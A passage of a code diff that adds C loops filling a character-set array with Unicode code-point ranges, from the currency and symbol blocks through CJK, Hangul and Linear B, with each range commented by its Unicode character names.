+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+// 10000..1007F; Linear B Syllabary
+	c = 0x10000;		// from LINEAR B SYLLABLE B008 A
+	while (c <= 0x1000b)	// ..to LINEAR B SYLLABLE B046 JE
+		charset[i++] = c++;
+	c = 0x1000d;		// from LINEAR B SYLLABLE B036 JO
+	while (c <= 0x10026)	// ..to LINEAR B SYLLABLE B032 QO
+		charset[i++] = c++;
+	c = 0x10028;		// from LINEAR B SYLLABLE B060 RA
+	while (c <= 0x1003a)	// ..to LINEAR B SYLLABLE B042 WO
+		charset[i++] = c++;
+	charset[i++] = 0x1003c;	// LINEAR B SYLLABLE B017 ZA
+	charset[i++] = 0x1003d;	// LINEAR B SYLLABLE B074 ZE
+	c = 0x1003f;		// from LINEAR B SYLLABLE B020 ZO
+	while (c <= 0x1004d)	// ..to LINEAR B SYLLABLE B091 TWO
+		charset[i++] = c++;
+	c = 0x10050;		// from LINEAR B SYMBOL B018
+	while (c <= 0x1005d)	// ..to LINEAR B SYMBOL B089
+		charset[i++] = c++;
+// 10080..100FF; Linear B Ideograms
+	c = 0x10080;		// from LINEAR B IDEOGRAM B100 MAN
+	while (c <= 0x100fa)	// ..to LINEAR B IDEOGRAM VESSEL B305
+		charset[i++] = c++;
+// 10100..1013F; Aegean Numbers
+	charset[i++] = 0x10100;	// AEGEAN WORD SEPARATOR LINE
+	charset[i++] = 0x10102;	// AEGEAN CHECK MARK
+	c = 0x10107;		// from AEGEAN NUMBER ONE
+	while (c <= 0x10133)	// ..to AEGEAN NUMBER NINETY THOUSAND
+		charset[i++] = c++;
+	c = 0x10137;		// from AEGEAN WEIGHT BASE UNIT
+	while (c <= 0x1013f)	// ..to AEGEAN MEASURE THIRD SUBUNIT
+		charset[i++] = c++;
+// 10140..1018F; Ancient Greek Numbers
+	c = 0x10140;		// from GREEK ACROPHONIC ATTIC ONE QUARTER
+	while (c <= 0x1018e)	// ..to NOMISMA SIGN
+		charset[i++] = c++;
+// 10190..101CF; Ancient Symbols
+	c = 0x10190;		// from ROMAN SEXTANS SIGN
+	while (c <= 0x1019b)	// ..to ROMAN CENTURIAL SIGN
+		charset[i++] = c++;
+	charset[i++] = 0x101a0;	// GREEK SYMBOL TAU RHO
+// 101D0..101FF; Phaistos Disc
+	c = 0x101d0;		// from PHAISTOS DISC SIGN PEDESTRIAN
+	while (c <= 0x101fd)	// ..to PHAISTOS DISC SIGN COMBINING OBLIQUE STROKE
+		charset[i++] = c++;
+// 10280..1029F; Lycian
+	c = 0x10280;		// from LYCIAN LETTER A
+	while (c <= 0x1029c)	// ..to LYCIAN LETTER X
+		charset[i++] = c++;
+// 102A0..102DF; Carian
